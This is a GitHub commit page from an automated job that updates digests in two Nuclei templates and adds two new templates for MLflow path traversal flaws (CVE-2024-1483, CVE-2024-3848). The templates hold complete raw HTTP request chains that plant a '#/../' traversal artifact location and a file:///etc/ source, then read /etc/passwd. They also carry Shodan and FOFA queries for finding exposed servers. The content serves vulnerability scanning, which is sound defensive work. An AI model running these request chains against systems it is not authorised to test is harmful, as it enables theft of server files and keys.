Skip to content

Commit

Permalink
Auto Update Nuclei [Tue Dec 3 18:27:55 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
@actions-user
actions-user committed Dec 3, 2024
1 parent 4e15d9a commit 2d0b2d1
Show file tree
Hide file tree
Showing 4 changed files with 226 additions and 2 deletions.
2 changes: 1 addition & 1 deletion plugins/adobe/experience_manager/CVE-2019-16469.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -57,4 +57,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a0048304602210082a6643645b37e01702752b369d5254b3ae3d9f54ebe564751e3ba7fa7b50d75022100b5ec6f99589fd782251e81288b7f5371de99c72c79d0a95e80a956314b737dd6:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f5ef3520351c980a0b96e60921b52a3e36df3b5f1fd18186aae8a464a815f24e022100c039ae6cdf25ae2452a44ca358cb7f3eda64f4dd99bc3463f076f4beaac6d52a:922c64590222798bb761d5b6d8e72950
2 changes: 1 addition & 1 deletion plugins/apache/solr/CVE-2024-45216.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221009b754f6c37b0d92438636734fe3b337640249ddb1cdde8b77ae21fed14a9885602206fa4c72b7d7d5ef40885c9be4956f9b87c0d9045db5e3daf60096887a947adb4:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220439395c4c4d636d1a944826400c9ec5f45a8b1fdde723a523e44a73b4794b8c4022078f145c4e9a5a3ca39a89b3d32a3fe5880e262dd7757a4f0acaa55beb1e96e66:922c64590222798bb761d5b6d8e72950
104 changes: 104 additions & 0 deletions plugins/lfprojects/mlflow/CVE-2024-1483.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,104 @@
id: CVE-2024-1483

info:
name: Mlflow < 2.9.2 - Path Traversal
author: gy741
severity: high
description: |
A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
reference:
- https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d
- https://nvd.nist.gov/vuln/detail/CVE-2024-1483
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1483
cwe-id: CWE-29
epss-score: 0.00044
epss-percentile: 0.11996
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects

http:
- raw:
- |
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}
- |
POST /api/2.0/mlflow/runs/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}
- |
GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_5
regex:
- "root:.*:0:0:"

- type: word
part: header_5
words:
- "filename=passwd"
- "application/octet-stream"
condition: and

- type: status
status:
- 200

extractors:
- type: json
part: body_1
name: EXPERIMENT_ID
group: 1
json:
- '.experiment_id'
internal: true

- type: json
part: body_2
name: RUN_ID
group: 1
json:
- '.run.info.run_id'
internal: true
# digest: 490a00463044022044f612e503d042e18e2ce06ed12d00b953d7229708ff7bec87ae951cefd422ca02206ad527749aa0b2d8f6198d6e641542219b917c96136b9d4a252f41e569097951:922c64590222798bb761d5b6d8e72950
120 changes: 120 additions & 0 deletions plugins/lfprojects/mlflow/CVE-2024-3848.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,120 @@
id: CVE-2024-3848

info:
name: Mlflow < 2.11.0 - Path Traversal
author: gy741
severity: high
description: |
A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for the previously addressed CVE-2023-6909. The vulnerability arises from the application's handling of artifact URLs, where a '#' character can be used to insert a path into the fragment, effectively skipping validation. This allows an attacker to construct a URL that, when processed, ignores the protocol scheme and uses the provided path for filesystem access. As a result, an attacker can read arbitrary files, including sensitive information such as SSH and cloud keys, by exploiting the way the application converts the URL into a filesystem path. The issue stems from insufficient validation of the fragment portion of the URL, leading to arbitrary file read through path traversal.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.12.1.
reference:
- https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610
- https://nvd.nist.gov/vuln/detail/CVE-2024-3848
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-3848
cwe-id: CWE-29
epss-score: 0.00043
epss-percentile: 0.10425
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects

variables:
random: "{{to_lower(rand_text_alpha(5))}}"

http:
- raw:
- |
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "artifact_location": "http://host#/../../../../../../../../../../../../../../etc/"}
- |
POST /api/2.0/mlflow/runs/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
Host: {{Hostname}}
{{random}}
- |
POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}
- |
GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_7
regex:
- "root:.*:0:0:"

- type: word
part: header_7
words:
- "filename=passwd"
- "application/octet-stream"
condition: and

- type: status
status:
- 200

extractors:
- type: json
part: body_1
name: EXPERIMENT_ID
group: 1
json:
- '.experiment_id'
internal: true

- type: json
part: body_2
name: RUN_ID
group: 1
json:
- '.run.info.run_id'
internal: true
# digest: 4b0a00483046022100c3409c8b66d6382e4cb01617ac1c4567e106c3d987267eaf4ae4041c23e6f5ab022100b18bf7148d1401117f5ba47f34b064fed6df63a199821cc4794aebbf675d6a03:922c64590222798bb761d5b6d8e72950

0 comments on commit 2d0b2d1

Please sign in to comment.